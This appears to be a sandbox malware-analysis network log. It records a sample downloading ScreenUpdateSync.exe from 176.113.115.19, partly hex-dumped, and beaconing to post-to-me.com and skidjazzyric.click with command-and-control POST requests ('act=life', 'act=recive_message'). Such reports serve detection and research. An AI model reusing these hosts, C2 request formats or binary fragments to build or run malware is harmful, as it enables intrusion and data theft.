                                                                          Jan 9, 2025 08:33:36.291771889 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.291778088 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291790009 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291802883 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291806936 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.291815042 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291820049 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.291829109 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291840076 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.291842937 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291856050 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291871071 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291881084 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.291891098 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.291923046 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:38.200488091 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.200545073 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:38.200612068 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.201859951 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.201880932 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:38.662003040 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:38.662091017 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.663979053 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.663997889 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:38.664244890 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:38.711721897 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.738890886 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.738971949 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:38.739034891 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.124531031 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.124619007 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.124686003 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.127228022 CET49747443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.127249956 CET44349747104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.136315107 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.136368036 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.136439085 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.136720896 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.136732101 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.613571882 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.613648891 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.614861012 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.614869118 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.615130901 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:39.616401911 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.616446972 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:39.616472006 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080409050 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080456972 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080485106 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080507994 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080506086 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.080523014 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080552101 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080553055 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.080579042 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080591917 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.080596924 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080629110 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.080634117 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.080885887 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.081047058 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.081051111 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.084937096 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.084984064 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.084988117 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.133563995 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.166124105 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.166316986 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.166342020 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.166383982 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.166393042 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.166429043 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.166431904 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.166466951 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.171510935 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.171521902 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.171547890 CET49753443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.171554089 CET44349753104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.913105011 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.913144112 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:40.913256884 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.913693905 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:40.913710117 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.045084953 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:41.045171976 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:41.386811018 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.386981964 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:41.388947010 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:41.388956070 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.389230013 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.391139984 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:41.391376019 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:41.391405106 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.948688030 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.948806047 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:41.948865891 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:41.948988914 CET49764443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:41.949008942 CET44349764104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.069190979 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.069246054 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.069319010 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.069757938 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.069772005 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.558862925 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.559005022 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.560715914 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.560729980 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.560995102 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.562432051 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.562737942 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.562767982 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:42.562952995 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:42.603334904 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:43.074234962 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:43.074326038 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:43.074635983 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:43.074635983 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:43.383656025 CET49771443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:43.383696079 CET44349771104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:43.707626104 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:43.707681894 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:43.707756042 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:43.708456993 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:43.708470106 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.185779095 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.185867071 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.187200069 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.187208891 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.187484026 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.188770056 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.188941956 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.188968897 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.189055920 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.189065933 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.818440914 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.818536997 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:33:44.818579912 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.818747044 CET49782443192.168.2.6104.21.64.1
                                                                          Jan 9, 2025 08:33:44.818759918 CET44349782104.21.64.1192.168.2.6
                                                                          Jan 9, 2025 08:35:23.910007000 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:35:24.211909056 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:35:24.821316004 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:35:26.026016951 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:35:28.434026003 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:35:33.243184090 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:35:42.961963892 CET4972680192.168.2.6176.113.115.19
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 9, 2025 08:33:33.926363945 CET6428153192.168.2.61.1.1.1
                                                                          Jan 9, 2025 08:33:33.942095041 CET53642811.1.1.1192.168.2.6
                                                                          Jan 9, 2025 08:33:38.182554007 CET6248153192.168.2.61.1.1.1
                                                                          Jan 9, 2025 08:33:38.194623947 CET53624811.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 9, 2025 08:33:33.926363945 CET192.168.2.61.1.1.10xdb77Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.182554007 CET192.168.2.61.1.1.10xee2cStandard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 9, 2025 08:33:33.942095041 CET1.1.1.1192.168.2.60xdb77No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:33.942095041 CET1.1.1.1192.168.2.60xdb77No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.64.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.32.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.16.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.96.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.80.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.48.1A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:33:38.194623947 CET1.1.1.1192.168.2.60xee2cNo error (0)skidjazzyric.click104.21.112.1A (IP address)IN (0x0001)false
                                                                          • post-to-me.com
                                                                          • skidjazzyric.click
                                                                          • 176.113.115.19
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649726176.113.115.19805920C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 08:33:35.106142998 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                          User-Agent: ShareScreen
                                                                          Host: 176.113.115.19
                                                                          Jan 9, 2025 08:33:35.800184011 CET1236INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:35 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Thu, 09 Jan 2025 07:30:02 GMT
                                                                          ETag: "53600-62b40f23d5dfc"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 341504
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a f6 05 ca 1e 97 6b 99 1e 97 6b 99 1e 97 6b 99 a3 d8 fd 99 1f 97 6b 99 00 c5 ef 99 3b 97 6b 99 00 c5 fe 99 00 97 6b 99 00 c5 e8 99 64 97 6b 99 39 51 10 99 1d 97 6b 99 1e 97 6a 99 6d 97 6b 99 00 c5 e1 99 1f 97 6b 99 00 c5 ff 99 1f 97 6b 99 00 c5 fa 99 1f 97 6b 99 52 69 63 68 1e 97 6b 99 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 7f f3 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 50 01 00 00 00 00 00 a5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 3f b1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Zkkkk;kkdk9QkjmkkkkRichkPELe$P^@@?*(hG@t.textV#$ `.data@`(@.rsrch@@
                                                                          Jan 9, 2025 08:33:35.800211906 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 2c 04 00 aa 2c 04 00 c2 2c 04 00 d6 2c 04 00 ee 2c 04 00 02 2d 04 00 18 2d 04 00 2e 2d 04 00 42 2d 04 00 52 2d 04 00 62 2d
                                                                          Data Ascii: ,,,,,--.-B-R-b-r-------....>.P.`.p......../2/F/N/\/n/z///////0060H0`0x0
                                                                          Jan 9, 2025 08:33:35.800226927 CET1236INData Raw: 00 00 00 02 2b 6e 40 00 ca 6d 40 00 ca 6d 40 00 00 00 00 00 00 00 00 00 00 00 f0 3f 7f 02 35 c2 68 21 a2 da 0f c9 3e 40 ff ff ff ff ff ff ef 7f 00 00 00 00 00 00 10 00 00 00 00 00 00 00 98 c0 00 00 00 00 00 00 98 40 00 00 00 00 00 00 f0 7f 00 00
                                                                          Data Ascii: +n@m@m@?5h!>@@EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocruntime error TLOSS errorSING error
                                                                          Jan 9, 2025 08:33:35.800237894 CET1236INData Raw: 36 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 74 68 72 65 61 64 20 64 61 74 61 0d 0a 00 0d 0a 54 68 69 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 72 65 71 75 65 73 74 65 64 20 74 68 65 20 52 75 6e 74 69
                                                                          Data Ascii: 6- not enough space for thread dataThis application has requested the Runtime to terminate it in an unusual way.Please contact the application's support team for more information.R6009- not enough space for environmentR6008
                                                                          Jan 9, 2025 08:33:35.800259113 CET1236INData Raw: 7e 65 e0 3f a8 2d a9 f8 19 66 1b 3e 00 00 00 00 00 00 e2 3f 00 00 00 98 5d 25 e1 3f 44 09 b5 47 95 de 3f 3e 00 00 00 00 00 00 e3 3f 00 00 00 a8 0b e0 e1 3f 83 5c 9b 9f f5 f7 3e 3e 00 00 00 00 00 00 e4 3f 00 00 00 58 8e 95 e2 3f 8a 31 ec 0d e3 08
                                                                          Data Ascii: ~e?-f>?]%?DG?>??\>>?X?1#>?E?h>???>??$49>?x8?k0H<>??r8>?8fm?"m>">?
                                                                          Jan 9, 2025 08:33:35.800277948 CET1236INData Raw: 00 00 00 00 00 40 01 40 00 00 00 f8 b4 45 f2 3f 8c a4 86 84 88 91 47 3e 00 00 00 00 00 80 01 40 00 00 00 ec 92 5b f2 3f 8e 33 14 45 d2 7b 41 3e 00 00 00 00 00 c0 01 40 00 00 00 54 ef 70 f2 3f 94 53 66 49 a2 53 3a 3e 00 00 00 00 00 00 02 40 00 00
                                                                          Data Ascii: @@E?G>@[?3E{A>@Tp?SfIS:>@X?B6)1<>@@3?>7>@$?s(N>@@?V6f=>@(?{>@@(W?-Jg >@?"aPK>
                                                                          Jan 9, 2025 08:33:35.800292015 CET1236INData Raw: fc fe f4 3f 04 0a 94 fb 3c c5 41 3e 00 00 00 00 00 40 0e 40 00 00 00 28 4a 07 f5 3f 10 49 8f 16 56 09 43 3e 00 00 00 00 00 80 0e 40 00 00 00 60 77 0f f5 3f bb 84 5e 04 40 a5 4e 3e 00 00 00 00 00 c0 0e 40 00 00 00 f8 84 17 f5 3f 87 23 b9 cd 25 aa
                                                                          Data Ascii: ?<A>@@(J?IVC>@`w?^@N>@?#%@>@s?MK>@@D'?Q->@.?9!G>@6?.1>@>?.1NcB> @cE?s1>@@LL
                                                                          Jan 9, 2025 08:33:35.800302982 CET108INData Raw: 00 00 00 00 00 80 15 40 00 00 00 c4 ce 34 f6 3f e6 68 61 f3 bb ad 3b 3e 00 00 00 00 00 a0 15 40 00 00 00 c8 04 39 f6 3f f9 8d 41 90 8c cd 44 3e 00 00 00 00 00 c0 15 40 00 00 00 e4 2e 3d f6 3f cc a4 4b 46 ff 77 fc 3d 00 00 00 00 00 e0 15 40 00 00
                                                                          Data Ascii: @4?ha;>@9?AD>@.=?KFw=@DMA?=@
                                                                          Jan 9, 2025 08:33:35.800314903 CET1236INData Raw: 60 45 f6 3f 61 70 91 49 30 ae 48 3e 00 00 00 00 00 20 16 40 00 00 00 98 67 49 f6 3f a4 99 3a 9d d8 c3 2d 3e 00 00 00 00 00 40 16 40 00 00 00 ec 63 4d f6 3f a5 f2 25 15 51 12 0e 3e 00 00 00 00 00 60 16 40 00 00 00 40 55 51 f6 3f 4c 79 35 da 9a 6f
                                                                          Data Ascii: `E?apI0H> @gI?:->@@cM?%Q>`@@UQ?Ly5oE>@;U?vg0/>@Y?jvUG>@\?yK>@,`?A%My>@md?H> @ h?pM>@@0k
                                                                          Jan 9, 2025 08:33:35.800328016 CET1236INData Raw: 00 00 00 00 00 80 1c 40 00 00 00 20 4c e9 f6 3f 4c 1f f4 02 64 e9 25 3e 00 00 00 00 00 a0 1c 40 00 00 00 0c bd eb f6 3f 22 d7 6c 22 77 20 f4 3d 00 00 00 00 00 c0 1c 40 00 00 00 a8 28 ee f6 3f 1a b0 3f d7 1c f2 21 3e 00 00 00 00 00 e0 1c 40 00 00
                                                                          Data Ascii: @ L?Ld%>@?"l"w =@(??!>@?j^J>@8?H0> @LL?%C>@@T?J+N>`@d?;l>0>@B?^{v@>@?@YB>
                                                                          Jan 9, 2025 08:33:35.805128098 CET1236INData Raw: 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 81 00 81 00 81 00 81 00 81 00 81 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649715104.21.56.704435920C:\Users\user\Desktop\Ljrprfl3BH.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:33:34 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                          User-Agent: ShareScreen
                                                                          Host: post-to-me.com
                                                                          2025-01-09 07:33:34 UTC802INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:34 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LaoWvbWd%2F3FL2a8Go4akiWBcivTKPvwbPY7Ed%2FLUN%2FB9MXo23hTfupMy77LeqEDNXfNAcitvqmo6%2FE4eGlvqJBlK5vv8w1QvTlhInKdCCvQejURiEPP6ieNwPzLiZzMAPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff2bd6b6d454364-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1979&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1418853&cwnd=210&unsent_bytes=0&cid=f659a1b9ede580c2&ts=461&x=0"
                                                                          2025-01-09 07:33:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                          Data Ascii: 2ok
                                                                          2025-01-09 07:33:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649747104.21.64.14432828C:\Users\user\AppData\Local\Temp\BF85.tmp.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:33:38 UTC265OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: skidjazzyric.click
                                                                          2025-01-09 07:33:38 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2025-01-09 07:33:39 UTC1131INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:39 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=1hkee306lasr6rq4lvr16nvlck; expires=Mon, 05 May 2025 01:20:17 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 1; mode=block
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PURfklu9xjtzNCOIgXdIaTOsfuegNCegR2%2FrRFHjKVpWH%2BgJ3734cB6rgOUPp5t3bYLmBYVrLI6JOpw41lP2d4Wnd3K%2FKFY0%2FFj51%2BaqsvM1MudwdkDySDTHvozryqrzqS5t8fE%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff2bd856e5942e9-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1645&rtt_var=639&sent=8&recv=8&lost=0&retrans=0&sent_bytes=3057&recv_bytes=909&delivery_rate=2525951&cwnd=241&unsent_bytes=0&cid=d6b8a7882d16cf45&ts=473&x=0"
                                                                          2025-01-09 07:33:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                          Data Ascii: 2ok
                                                                          2025-01-09 07:33:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649753104.21.64.14432828C:\Users\user\AppData\Local\Temp\BF85.tmp.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:33:39 UTC266OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 74
                                                                          Host: skidjazzyric.click
                                                                          2025-01-09 07:33:39 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                          Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                          2025-01-09 07:33:40 UTC1121INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
